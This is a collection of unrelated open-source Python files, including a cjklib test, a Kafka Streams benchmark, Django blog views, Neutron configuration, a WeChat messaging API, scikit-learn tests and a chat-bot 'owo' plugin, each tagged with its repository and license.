{'toneMarkType': 'chaoDigits'},
{'toneMarkType': 'superscriptChaoDigits'},
#{'toneMarkType': 'numbers', 'missingToneMark': 'ignore'},
{'toneMarkType': 'chaoDigits', 'missingToneMark': 'ignore'},
{'toneMarkType': 'superscriptChaoDigits',
'missingToneMark': 'ignore'},
#{'toneMarkType': 'diacritics'}, # TODO NotImplementedError
#{'toneMarkType': 'diacritics', 'missingToneMark': 'ignore'},
{'toneMarkType': 'none'}],
)
@staticmethod
def testUpperCase(dialect):
return False
def cleanDecomposition(self, decomposition, reading, **options):
return [entity for entity in decomposition if entity != '.']
class ShanghaineseIPAReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'ShanghaineseIPA'
DECOMPOSITION_REFERENCES = [
({'toneMarkType': 'superscriptChaoDigits'}, [
(u'ɦi⁵³ ɦɑ̃⁵³.ʦɤ lɛ⁵³ gəˀ¹²', [u'ɦi⁵³', ' ', u'ɦɑ̃⁵³', '.', u'ʦɤ',
' ', u'lɛ⁵³', ' ', u'gəˀ¹²']),
]),
]
COMPOSITION_REFERENCES = [
({'toneMarkType': 'superscriptChaoDigits'}, [
([u'ɦi⁵³', ' ', u'ɦɑ̃⁵³', u'ʦɤ', ' ', u'lɛ⁵³', ' ', u'gəˀ¹²'],
u'ɦi⁵³ ɦɑ̃⁵³.ʦɤ lɛ⁵³ gəˀ¹²'),
]),
]
READING_ENTITY_REFERENCES = [
({'toneMarkType': 'chaoDigits'}, [
(u"tʰi53", True),
(u"tʰi34", True),
(u"di23", True),
(u"tʰiɪˀ55", True),
(u"diɪˀ12", True),
(u"noŋ53", True),
(u"diɪˀ1", False),
(u"diɪˀ23", True),
(u"diɪˀ55", True), # YinRu
]),
({'toneMarkType': 'superscriptChaoDigits'}, [
(u"tʰi⁵³", True),
(u"tʰi³⁴", True),
(u"di²³", True),
(u"tʰiɪˀ⁵⁵", True),
(u"diɪˀ¹²", True),
(u"noŋ⁵³", True),
(u"diɪˀ¹", False),
]),
({'toneMarkType': 'ipaToneBar'}, [
(u"tʰi˥˧", True),
(u"tʰi˧˦", True),
(u"di˨˧", True),
(u"tʰiɪˀ˥˥", True),
(u"diɪˀ˩˨", True),
(u"noŋ˥˧", True),
(u"tʰi˥", False),
]),
({'toneMarkType': 'chaoDigits', 'constrainEntering': True}, [
(u"tʰi53", True),
(u"tʰi34", True),
(u"di23", True),
(u"tʰiɪˀ55", True),
(u"diɪˀ12", True),
(u"noŋ53", True),
(u"diɪˀ1", False),
(u"diɪˀ23", False), # YangQu
(u"diɪˀ55", True), # YinRu
(u"di55", False), # YinRu
]),
({'toneMarkType': 'chaoDigits', 'constrainToneCategories': True}, [
(u"tʰi53", True),
(u"tʰi34", True),
(u"di23", True),
(u"tʰiɪˀ55", True),
(u"diɪˀ12", True),
(u"noŋ53", False), # Voiced + YinPing
(u"diɪˀ1", False),
(u"diɪˀ23", True), # Voiced + YangQu
(u"diɪˀ55", False), # Voiced + YinRu
(u"di55", False), # Voiced + YinRu
]),
({'toneMarkType': 'chaoDigits', 'constrainEntering': True,
'constrainToneCategories': True}, [
(u"tʰi53", True),
(u"tʰi34", True),
(u"di23", True),
(u"tʰiɪˀ55", True),
(u"diɪˀ12", True),
(u"noŋ53", False), # Voiced + YinPing
(u"diɪˀ1", False),
(u"diɪˀ23", False), # Voiced + YangQu
(u"diɪˀ55", False), # Voiced + YinRu
(u"di55", False), # Voiced + YinRu
]),
]
GUESS_DIALECT_REFERENCES = [
(u"zã˥˧", {'toneMarkType': 'ipaToneBar'}),
(u"zã53", {'toneMarkType': 'chaoDigits'}),
(u"ɦɑ⁵³.ʦɤ", {'toneMarkType': 'superscriptChaoDigits'}),
]
| tomas-mazak/taipan | taipan/cjklib/test/readingoperator.py | Python | gpl-3.0 | 110,252 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ducktape.tests.test import Test
from ducktape.mark.resource import cluster
from ducktape.mark import parametrize, matrix
from kafkatest.tests.kafka_test import KafkaTest
from kafkatest.services.performance.streams_performance import StreamsSimpleBenchmarkService
from kafkatest.services.zookeeper import ZookeeperService
from kafkatest.services.kafka import KafkaService
from kafkatest.version import DEV_BRANCH
class StreamsSimpleBenchmarkTest(Test):
"""
Simple benchmark of Kafka Streams.
"""
def __init__(self, test_context):
super(StreamsSimpleBenchmarkTest, self).__init__(test_context)
self.num_records = 10000000L
self.replication = 1
self.num_threads = 1
@cluster(num_nodes=9)
@matrix(test=["produce", "consume", "count", "processstream", "processstreamwithsink", "processstreamwithstatestore", "processstreamwithcachedstatestore", "kstreamktablejoin", "kstreamkstreamjoin", "ktablektablejoin", "yahoo"], scale=[1, 3])
def test_simple_benchmark(self, test, scale):
"""
Run simple Kafka Streams benchmark
"""
self.driver = [None] * (scale + 1)
node = [None] * (scale)
data = [None] * (scale)
#############
# SETUP PHASE
#############
self.zk = ZookeeperService(self.test_context, num_nodes=1)
self.zk.start()
self.kafka = KafkaService(self.test_context, num_nodes=scale, zk=self.zk, version=DEV_BRANCH, topics={
'simpleBenchmarkSourceTopic' : { 'partitions': scale, 'replication-factor': self.replication },
'countTopic' : { 'partitions': scale, 'replication-factor': self.replication },
'simpleBenchmarkSinkTopic' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic1KStreamKStream' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic2KStreamKStream' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic1KStreamKTable' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic2KStreamKTable' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic1KTableKTable' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic2KTableKTable' : { 'partitions': scale, 'replication-factor': self.replication },
'yahooCampaigns' : { 'partitions': 20, 'replication-factor': self.replication },
'yahooEvents' : { 'partitions': 20, 'replication-factor': self.replication }
})
self.kafka.log_level = "INFO"
self.kafka.start()
################
# LOAD PHASE
################
self.load_driver = StreamsSimpleBenchmarkService(self.test_context, self.kafka,
self.num_records * scale, "true", test,
self.num_threads)
self.load_driver.start()
self.load_driver.wait()
self.load_driver.stop()
################
# RUN PHASE
################
for num in range(0, scale):
self.driver[num] = StreamsSimpleBenchmarkService(self.test_context, self.kafka,
self.num_records/(scale), "false", test,
self.num_threads)
self.driver[num].start()
#######################
# STOP + COLLECT PHASE
#######################
for num in range(0, scale):
self.driver[num].wait()
self.driver[num].stop()
node[num] = self.driver[num].node
node[num].account.ssh("grep Performance %s" % self.driver[num].STDOUT_FILE, allow_fail=False)
data[num] = self.driver[num].collect_data(node[num], "" )
final = {}
for num in range(0, scale):
for key in data[num]:
final[key + str(num)] = data[num][key]
return final
| themarkypantz/kafka | tests/kafkatest/benchmarks/streams/streams_simple_benchmark_test.py | Python | apache-2.0 | 4,969 |
from django.core.context_processors import csrf
from django.shortcuts import render, render_to_response, get_object_or_404
from blog.models import makale, yorum, kategori
from django.core.paginator import Paginator, InvalidPage, EmptyPage
from django.core.urlresolvers import reverse
from django.http import HttpResponse, HttpResponseRedirect
from blog.forms import yorumForm
# Create your views here.
def makale_views(request):
makaleler = makale.objects.all().order_by('-tarih')
paginator = Paginator(makaleler, 3)
try:
page = int(request.GET.get("page", '1'))
except ValueError:
page = 1
try:
makaleler = paginator.page(page)
except (InvalidPage, EmptyPage):
makaleler = paginator.page(paginator)
return render_to_response("list.html", dict(makaleler=makaleler, user=request.user))
def makale_goster(request, slug):
makalem = get_object_or_404(makale, slug = slug)
return render_to_response("makale.html", dict(makalem=makalem, user=request.user))
def yorum_ekle(request):
if request.POST:
form = yorumForm(request.POST)
if form.is_valid():
form.save
# return HttpResponseRedirect('sitem.blog.views.makale_goster')
else:
form = yorumForm()
args = {}
args.update(csrf(request))
args['form'] = form
return render_to_response('makale.html', args)
def kategori(request):
kategoriler = kategori.objects.all().order_by('-tarih')
return render_to_response('panel.html', dict(kategoriler=kategoriler))
| gencelo/tlog | app/blog/views.py | Python | mit | 1,558 |
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
# -*- coding: utf-8 -*-
"""
Map tile acquisition
--------------------
Demonstrates cartopy's ability to draw map tiles which are downloaded on
demand from the MapQuest tile server. Internally these tiles are then combined
into a single image and displayed in the cartopy GeoAxes.
"""
import matplotlib.pyplot as plt
from matplotlib.transforms import offset_copy
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
%matplotlib inline
def main():
# Create a Stamen Terrain instance.
terrain = cimgt.StamenTerrain()
# Create a GeoAxes in the tile's projection.
plt.figure(figsize=(10,10))
ax = plt.axes(projection=terrain.crs)
# Limit the extent of the map to a small longitude/latitude range.
ax.set_extent([-122.3, -122, 46.1, 46.3])
# Add the MapQuest data at zoom level 8.
ax.add_image(terrain, 12)
# Add a marker for the Mount Saint Helens volcano.
plt.plot(-122.189611,46.205868, marker='o', color='yellow', markersize=12,
alpha=0.7, transform=ccrs.Geodetic())
# Use the cartopy interface to create a matplotlib transform object
# for the Geodetic coordinate system. We will use this along with
# matplotlib's offset_copy function to define a coordinate system which
# translates the text by 25 pixels to the left.
geodetic_transform = ccrs.Geodetic()._as_mpl_transform(ax)
text_transform = offset_copy(geodetic_transform, units='dots', x=-25)
# Add text 25 pixels to the left of the volcano.
plt.text(-122.189611,46.205868, u'Mount Saint Helens Volcano',
verticalalignment='center', horizontalalignment='right',
transform=text_transform,
bbox=dict(facecolor='wheat', alpha=0.5, boxstyle='round'))
gl=ax.gridlines(draw_labels=True)
gl.xlabels_top = False
gl.ylabels_right = False
plt.show()
if __name__ == '__main__':
main()
# <codecell>
# <codecell>
# <codecell>
| rsignell-usgs/notebook | Cartopy/Cartopy_terrain.py | Python | mit | 2,013 |
# Copyright 2011 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Routines for configuring Neutron
"""
import os
import sys
from keystoneclient import auth
from keystoneclient import session as ks_session
from oslo_config import cfg
from oslo_db import options as db_options
from oslo_log import log as logging
import oslo_messaging
from paste import deploy
from neutron.api.v2 import attributes
from neutron.common import utils
from neutron.i18n import _LI
from neutron import version
LOG = logging.getLogger(__name__)
core_opts = [
cfg.StrOpt('bind_host', default='0.0.0.0',
help=_("The host IP to bind to")),
cfg.IntOpt('bind_port', default=9696,
help=_("The port to bind to")),
cfg.StrOpt('api_paste_config', default="api-paste.ini",
help=_("The API paste config file to use")),
cfg.StrOpt('api_extensions_path', default="",
help=_("The path for API extensions")),
cfg.StrOpt('auth_strategy', default='keystone',
help=_("The type of authentication to use")),
cfg.StrOpt('core_plugin',
help=_("The core plugin Neutron will use")),
cfg.ListOpt('service_plugins', default=[],
help=_("The service plugins Neutron will use")),
cfg.StrOpt('base_mac', default="fa:16:3e:00:00:00",
help=_("The base MAC address Neutron will use for VIFs")),
cfg.IntOpt('mac_generation_retries', default=16,
help=_("How many times Neutron will retry MAC generation")),
cfg.BoolOpt('allow_bulk', default=True,
help=_("Allow the usage of the bulk API")),
cfg.BoolOpt('allow_pagination', default=False,
help=_("Allow the usage of the pagination")),
cfg.BoolOpt('allow_sorting', default=False,
help=_("Allow the usage of the sorting")),
cfg.StrOpt('pagination_max_limit', default="-1",
help=_("The maximum number of items returned in a single "
"response, value was 'infinite' or negative integer "
"means no limit")),
cfg.IntOpt('max_dns_nameservers', default=5,
help=_("Maximum number of DNS nameservers")),
cfg.IntOpt('max_subnet_host_routes', default=20,
help=_("Maximum number of host routes per subnet")),
cfg.IntOpt('max_fixed_ips_per_port', default=5,
help=_("Maximum number of fixed ips per port")),
cfg.StrOpt('default_ipv4_subnet_pool', default=None,
help=_("Default IPv4 subnet-pool to be used for automatic "
"subnet CIDR allocation")),
cfg.StrOpt('default_ipv6_subnet_pool', default=None,
help=_("Default IPv6 subnet-pool to be used for automatic "
"subnet CIDR allocation")),
cfg.IntOpt('dhcp_lease_duration', default=86400,
deprecated_name='dhcp_lease_time',
help=_("DHCP lease duration (in seconds). Use -1 to tell "
"dnsmasq to use infinite lease times.")),
cfg.BoolOpt('dhcp_agent_notification', default=True,
help=_("Allow sending resource operation"
" notification to DHCP agent")),
cfg.BoolOpt('allow_overlapping_ips', default=False,
help=_("Allow overlapping IP support in Neutron")),
cfg.StrOpt('host', default=utils.get_hostname(),
help=_("Hostname to be used by the neutron server, agents and "
"services running on this machine. All the agents and "
"services running on this machine must use the same "
"host value.")),
cfg.BoolOpt('force_gateway_on_subnet', default=True,
help=_("Ensure that configured gateway is on subnet. "
"For IPv6, validate only if gateway is not a link "
"local address. Deprecated, to be removed during the "
"K release, at which point the check will be "
"mandatory.")),
cfg.BoolOpt('notify_nova_on_port_status_changes', default=True,
help=_("Send notification to nova when port status changes")),
cfg.BoolOpt('notify_nova_on_port_data_changes', default=True,
help=_("Send notification to nova when port data (fixed_ips/"
"floatingip) changes so nova can update its cache.")),
cfg.StrOpt('nova_url',
default='http://127.0.0.1:8774/v2',
help=_('URL for connection to nova. '
'Deprecated in favour of an auth plugin in [nova].')),
cfg.StrOpt('nova_admin_username',
help=_('Username for connecting to nova in admin context. '
'Deprecated in favour of an auth plugin in [nova].')),
cfg.StrOpt('nova_admin_password',
help=_('Password for connection to nova in admin context. '
'Deprecated in favour of an auth plugin in [nova].'),
secret=True),
cfg.StrOpt('nova_admin_tenant_id',
help=_('The uuid of the admin nova tenant. '
'Deprecated in favour of an auth plugin in [nova].')),
cfg.StrOpt('nova_admin_tenant_name',
help=_('The name of the admin nova tenant. '
'Deprecated in favour of an auth plugin in [nova].')),
cfg.StrOpt('nova_admin_auth_url',
default='http://localhost:5000/v2.0',
help=_('Authorization URL for connecting to nova in admin '
'context. '
'Deprecated in favour of an auth plugin in [nova].')),
cfg.IntOpt('send_events_interval', default=2,
help=_('Number of seconds between sending events to nova if '
'there are any events to send.')),
cfg.BoolOpt('advertise_mtu', default=False,
help=_('If True, effort is made to advertise MTU settings '
'to VMs via network methods (DHCP and RA MTU options) '
'when the network\'s preferred MTU is known.')),
cfg.BoolOpt('vlan_transparent', default=False,
help=_('If True, then allow plugins that support it to '
'create VLAN transparent networks.')),
]
core_cli_opts = [
cfg.StrOpt('state_path',
default='/var/lib/neutron',
help=_("Where to store Neutron state files. "
"This directory must be writable by the agent.")),
]
# Register the configuration options
cfg.CONF.register_opts(core_opts)
cfg.CONF.register_cli_opts(core_cli_opts)
# Ensure that the control exchange is set correctly
oslo_messaging.set_transport_defaults(control_exchange='neutron')
_SQL_CONNECTION_DEFAULT = 'sqlite://'
# Update the default QueuePool parameters. These can be tweaked by the
# configuration variables - max_pool_size, max_overflow and pool_timeout
db_options.set_defaults(cfg.CONF,
connection=_SQL_CONNECTION_DEFAULT,
sqlite_db='', max_pool_size=10,
max_overflow=20, pool_timeout=10)
NOVA_CONF_SECTION = 'nova'
nova_deprecated_opts = {
'cafile': [cfg.DeprecatedOpt('nova_ca_certificates_file', 'DEFAULT')],
'insecure': [cfg.DeprecatedOpt('nova_api_insecure', 'DEFAULT')],
}
ks_session.Session.register_conf_options(cfg.CONF, NOVA_CONF_SECTION,
deprecated_opts=nova_deprecated_opts)
auth.register_conf_options(cfg.CONF, NOVA_CONF_SECTION)
nova_opts = [
cfg.StrOpt('region_name',
deprecated_name='nova_region_name',
deprecated_group='DEFAULT',
help=_('Name of nova region to use. Useful if keystone manages'
' more than one region.')),
]
cfg.CONF.register_opts(nova_opts, group=NOVA_CONF_SECTION)
logging.register_options(cfg.CONF)
def init(args, **kwargs):
cfg.CONF(args=args, project='neutron',
version='%%(prog)s %s' % version.version_info.release_string(),
**kwargs)
# FIXME(ihrachys): if import is put in global, circular import
# failure occurs
from neutron.common import rpc as n_rpc
n_rpc.init(cfg.CONF)
# Validate that the base_mac is of the correct format
msg = attributes._validate_regex(cfg.CONF.base_mac,
attributes.MAC_PATTERN)
if msg:
msg = _("Base MAC: %s") % msg
raise Exception(msg)
def setup_logging():
"""Sets up the logging options for a log with supplied name."""
product_name = "neutron"
logging.setup(cfg.CONF, product_name)
LOG.info(_LI("Logging enabled!"))
LOG.info(_LI("%(prog)s version %(version)s"),
{'prog': sys.argv[0],
'version': version.version_info.release_string()})
LOG.debug("command line: %s", " ".join(sys.argv))
def load_paste_app(app_name):
"""Builds and returns a WSGI app from a paste config file.
:param app_name: Name of the application to load
:raises ConfigFilesNotFoundError when config file cannot be located
:raises RuntimeError when application cannot be loaded from config file
"""
config_path = cfg.CONF.find_file(cfg.CONF.api_paste_config)
if not config_path:
raise cfg.ConfigFilesNotFoundError(
config_files=[cfg.CONF.api_paste_config])
config_path = os.path.abspath(config_path)
LOG.info(_LI("Config paste file: %s"), config_path)
try:
app = deploy.loadapp("config:%s" % config_path, name=app_name)
except (LookupError, ImportError):
msg = (_("Unable to load %(app_name)s from "
"configuration file %(config_path)s.") %
{'app_name': app_name,
'config_path': config_path})
LOG.exception(msg)
raise RuntimeError(msg)
return app
| yuewko/neutron | neutron/common/config.py | Python | apache-2.0 | 10,476 |
"""
`reconstruction_loop` originally part of CellProfiler,
code licensed under both GPL and BSD licenses.
Website: http://www.cellprofiler.org
Copyright (c) 2003-2009 Massachusetts Institute of Technology
Copyright (c) 2009-2011 Broad Institute
All rights reserved.
Original author: Lee Kamentsky
"""
# pythran export reconstruction_loop(uint32[], int32[], int32[], int32[],
# intp, intp)
def reconstruction_loop(ranks, prev, next, strides, current_idx, image_stride):
"""The inner loop for reconstruction.
This algorithm uses the rank-order of pixels. If low intensity pixels have
a low rank and high intensity pixels have a high rank, then this loop
performs reconstruction by dilation. If this ranking is reversed, the
result is reconstruction by erosion.
For each pixel in the seed image, check its neighbors. If its neighbor's
rank is below that of the current pixel, replace the neighbor's rank with
the rank of the current pixel. This dilation is limited by the mask, i.e.
the rank at each pixel cannot exceed the mask as that pixel.
Parameters
----------
ranks : array
The rank order of the flattened seed and mask images.
prev, next: arrays
Indices of previous and next pixels in rank sorted order.
strides : array
Strides to neighbors of the current pixel.
current_idx : int
Index of highest-ranked pixel used as starting point in loop.
image_stride : int
Stride between seed image and mask image in `aranks`.
"""
nstrides = strides.shape[0]
while current_idx != -1:
if current_idx < image_stride:
current_rank = ranks[current_idx]
if current_rank == 0:
break
for i in range(nstrides):
neighbor_idx = current_idx + strides[i]
neighbor_rank = ranks[neighbor_idx]
# Only propagate neighbors ranked below the current rank
if neighbor_rank < current_rank:
mask_rank = ranks[neighbor_idx + image_stride]
# Only propagate neighbors ranked below the mask rank
if neighbor_rank < mask_rank:
# Raise the neighbor to the mask rank if
# the mask ranked below the current rank
if mask_rank < current_rank:
current_link = neighbor_idx + image_stride
ranks[neighbor_idx] = mask_rank
else:
current_link = current_idx
ranks[neighbor_idx] = current_rank
# unlink the neighbor
nprev = prev[neighbor_idx]
nnext = next[neighbor_idx]
next[nprev] = nnext
if nnext != -1:
prev[nnext] = nprev
# link to the neighbor after the current link
nnext = next[current_link]
next[neighbor_idx] = nnext
prev[neighbor_idx] = current_link
if nnext >= 0:
prev[nnext] = neighbor_idx
next[current_link] = neighbor_idx
current_idx = next[current_idx]
| serge-sans-paille/pythran | pythran/tests/scikit-image/_greyreconstruct.py | Python | bsd-3-clause | 3,405 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2007,2009 Zuza Software Foundation
#
# This file is part of the Translate Toolkit.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""Class that manages .ini files for translation
.. note::: A simple summary of what is permissible follows.
# a comment
; a comment
[Section]
a = a string
b : a string
"""
import re
from io import BytesIO
from iniparse import INIConfig
from translate.storage import base
dialects = {}
def register_dialect(dialect):
"""Decorator that registers the dialect."""
dialects[dialect.name] = dialect
return dialect
class Dialect(object):
"""Base class for differentiating dialect options and functions"""
name = None
@register_dialect
class DialectDefault(Dialect):
name = 'default'
def unescape(self, text):
return text
def escape(self, text):
return text.encode('utf-8')
@register_dialect
class DialectInno(DialectDefault):
name = 'inno'
def unescape(self, text):
return text.replace("%n", "\n").replace("%t", "\t")
def escape(self, text):
return text.replace("\t", "%t").replace("\n", "%n").encode('utf-8')
class iniunit(base.TranslationUnit):
"""A INI file entry"""
def __init__(self, source=None, **kwargs):
self.location = ""
if source:
self.source = source
super(iniunit, self).__init__(source)
def addlocation(self, location):
self.location = location
def getlocations(self):
return [self.location]
class inifile(base.TranslationStore):
"""An INI file"""
UnitClass = iniunit
def __init__(self, inputfile=None, unitclass=iniunit, dialect="default"):
"""construct an INI file, optionally reading in from inputfile."""
self.UnitClass = unitclass
self._dialect = dialects.get(dialect, DialectDefault)() # fail correctly/use getattr/
base.TranslationStore.__init__(self, unitclass=unitclass)
self.units = []
self.filename = ''
self._inifile = None
if inputfile is not None:
self.parse(inputfile)
def serialize(self):
_outinifile = self._inifile
for unit in self.units:
for location in unit.getlocations():
match = re.match('\\[(?P<section>.+)\\](?P<entry>.+)', location)
_outinifile[match.groupdict()['section']][match.groupdict()['entry']] = self._dialect.escape(unit.target)
if _outinifile:
return str(_outinifile)
else:
return b""
def parse(self, input):
"""Parse the given file or file source string."""
if hasattr(input, 'name'):
self.filename = input.name
elif not getattr(self, 'filename', ''):
self.filename = ''
if hasattr(input, "read"):
inisrc = input.read()
input.close()
input = inisrc
if isinstance(input, bytes):
input = BytesIO(input)
self._inifile = INIConfig(input, optionxformvalue=None)
else:
self._inifile = INIConfig(file(input), optionxformvalue=None)
for section in self._inifile:
for entry in self._inifile[section]:
source = self._dialect.unescape(self._inifile[section][entry])
newunit = self.addsourceunit(source)
newunit.addlocation("[%s]%s" % (section, entry))
| claudep/translate | translate/storage/ini.py | Python | gpl-2.0 | 4,052 |
# -*- coding: utf-8 -*-
from optionaldict import optionaldict
from wechatpy.client.api.base import BaseWeChatAPI
class WeChatKFMessage(BaseWeChatAPI):
"""
发送微信客服消息
https://work.weixin.qq.com/api/doc/90000/90135/94677
支持:
* 文本消息
* 图片消息
* 语音消息
* 视频消息
* 文件消息
* 图文链接
* 小程序
* 菜单消息
* 地理位置
"""
def send(self, user_id, open_kfid, msgid="", msg=None):
"""
当微信客户处于“新接入待处理”或“由智能助手接待”状态下,可调用该接口给用户发送消息。
注意仅当微信客户在主动发送消息给客服后的48小时内,企业可发送消息给客户,最多可发送5条消息;若用户继续发送消息,企业可再次下发消息。
支持发送消息类型:文本、图片、语音、视频、文件、图文、小程序、菜单消息、地理位置。
:param user_id: 指定接收消息的客户UserID
:param open_kfid: 指定发送消息的客服帐号ID
:param msgid: 指定消息ID
:param tag_ids: 标签ID列表。
:param msg: 发送消息的 dict 对象
:type msg: dict | None
:return: 接口调用结果
"""
msg = msg or {}
data = {
"touser": user_id,
"open_kfid": open_kfid,
}
if msgid:
data["msgid"] = msgid
data.update(msg)
return self._post("kf/send_msg", data=data)
def send_text(self, user_id, open_kfid, content, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "text", "text": {"content": content}},
)
def send_image(self, user_id, open_kfid, media_id, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "image", "image": {"media_id": media_id}},
)
def send_voice(self, user_id, open_kfid, media_id, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "voice", "voice": {"media_id": media_id}},
)
def send_video(self, user_id, open_kfid, media_id, msgid=""):
video_data = optionaldict()
video_data["media_id"] = media_id
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "video", "video": dict(video_data)},
)
def send_file(self, user_id, open_kfid, media_id, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "file", "file": {"media_id": media_id}},
)
def send_articles_link(self, user_id, open_kfid, article, msgid=""):
articles_data = {
"title": article["title"],
"desc": article["desc"],
"url": article["url"],
"thumb_media_id": article["thumb_media_id"],
}
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "news", "link": {"link": articles_data}},
)
def send_msgmenu(self, user_id, open_kfid, head_content, menu_list, tail_content, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={
"msgtype": "msgmenu",
"msgmenu": {"head_content": head_content, "list": menu_list, "tail_content": tail_content},
},
)
def send_location(self, user_id, open_kfid, name, address, latitude, longitude, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={
"msgtype": "location",
"msgmenu": {"name": name, "address": address, "latitude": latitude, "longitude": longitude},
},
)
def send_miniprogram(self, user_id, open_kfid, appid, title, thumb_media_id, pagepath, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={
"msgtype": "miniprogram",
"msgmenu": {"appid": appid, "title": title, "thumb_media_id": thumb_media_id, "pagepath": pagepath},
},
)
| wechatpy/wechatpy | wechatpy/work/client/api/kf_message.py | Python | mit | 4,405 |
"""
OwO whats this?
"""
__author__ = ('Smurphicus')
COMMAND = 'owo'
from random import choice
substitutions = {'r':'w','R':'W','l':'w','L':'W','na':'nya','NA':'NYA','qu':'qw','QU':'QW'}
faces = [' OwO', ' owo', ' UwU', ' uwu', ' :3', ' :33', ' :333', '']
def owoify(message):
for key in substitutions.keys():
message = message.replace(key,substitutions[key])
return message + choice(faces)
def main(bot, author_id, message, thread_id, thread_type, **kwargs):
message = bot.fetchThreadMessages(thread_id=thread_id, limit=2)[1]
owoified_message = owoify(message.text)
bot.sendMessage(owoified_message, thread_id=thread_id, thread_type=thread_type)
| sentriz/steely | steely/plugins/owo.py | Python | gpl-3.0 | 679 |
import nose
import numpy as np
from scipy import sparse as sp
from sklearn.svm.bounds import l1_min_c
from sklearn.svm import LinearSVC
from sklearn.linear_model.logistic import LogisticRegression
from sklearn.svm.sparse import LinearSVC as SparseSVC
from sklearn.linear_model.sparse.logistic import LogisticRegression as \
SparseLogRegression
dense_X = [[-1, 0], [0, 1], [1, 1], [1, 1]]
sparse_X = sp.csr_matrix(dense_X)
Y1 = [0, 1, 1, 1]
Y2 = [2, 1, 0, 0]
def test_l1_min_c():
losses = ['l2', 'log']
Xs = {'sparse': sparse_X, 'dense': dense_X}
Ys = {'two-classes': Y1, 'multi-class': Y2}
intercepts = {'no-intercept': {'fit_intercept': False},
'fit-intercept': {'fit_intercept': True,
'intercept_scaling': 10}}
for loss in losses:
for X_label, X in Xs.items():
for Y_label, Y in Ys.items():
for intercept_label, intercept_params in intercepts.items():
check = lambda: check_l1_min_c(X, Y, loss,
**intercept_params)
check.description = 'Test l1_min_c loss=%r %s %s %s' % \
(loss, X_label, Y_label, intercept_label)
yield check
def check_l1_min_c(X, y, loss, fit_intercept=True, intercept_scaling=None):
min_c = l1_min_c(X, y, loss, fit_intercept, intercept_scaling)
clf = {
('log', False): LogisticRegression(penalty='l1'),
('log', True): SparseLogRegression(penalty='l1'),
('l2', False): LinearSVC(loss='l2', penalty='l1', dual=False),
('l2', True): SparseSVC(loss='l2', penalty='l1', dual=False),
}[loss, sp.issparse(X)]
clf.fit_intercept = fit_intercept
clf.intercept_scaling = intercept_scaling
clf.C = min_c
clf.fit(X, y)
assert (np.asanyarray(clf.coef_) == 0).all()
assert (np.asanyarray(clf.intercept_) == 0).all()
clf.C = min_c * 1.01
clf.fit(X, y)
assert (np.asanyarray(clf.coef_) != 0).any() or \
(np.asanyarray(clf.intercept_) != 0).any()
@nose.tools.raises(ValueError)
def test_ill_posed_min_c():
X = [[0, 0], [0, 0]]
y = [0, 1]
l1_min_c(X, y)
@nose.tools.raises(ValueError)
def test_unsupported_loss():
l1_min_c(dense_X, Y1, 'l1')
| ominux/scikit-learn | sklearn/svm/tests/test_bounds.py | Python | bsd-3-clause | 2,389 |
# -*- coding: utf-8 -*-
"""
Tests specific to the local backend.
"""
import pytest
pytestmark = pytest.mark.usefixtures("teardown_cauldron")
from ..conftest import fail_if_not_teardown
@pytest.fixture
def backend(request):
"""Use the local backend."""
from Cauldron.api import use
use('mock')
request.addfinalizer(fail_if_not_teardown)
@pytest.fixture
def mock_service(backend, servicename, config, keyword_name):
"""A 'mock' service, which is forgiving."""
from Cauldron.DFW import Service
svc = Service(servicename, config=config)
mykw = svc[keyword_name]
return svc
@pytest.fixture
def mock_client(request, servicename):
"""A 'mock' client, which doesn't even require a service backend."""
from Cauldron import ktl
svc = ktl.Service(servicename)
request.addfinalizer(svc.shutdown)
return svc
def test_duplicate_services(backend, servicename):
"""Test duplicate 'mock' services."""
from Cauldron.DFW import Service
svc = Service(servicename, config=None)
with pytest.raises(ValueError):
svc2 = Service(servicename, config=None)
svc3 = Service.get_service(servicename)
assert svc3 is svc
def test_client_not_started(backend, servicename):
"""Use mock, don't fail when a client hasn't been started yet."""
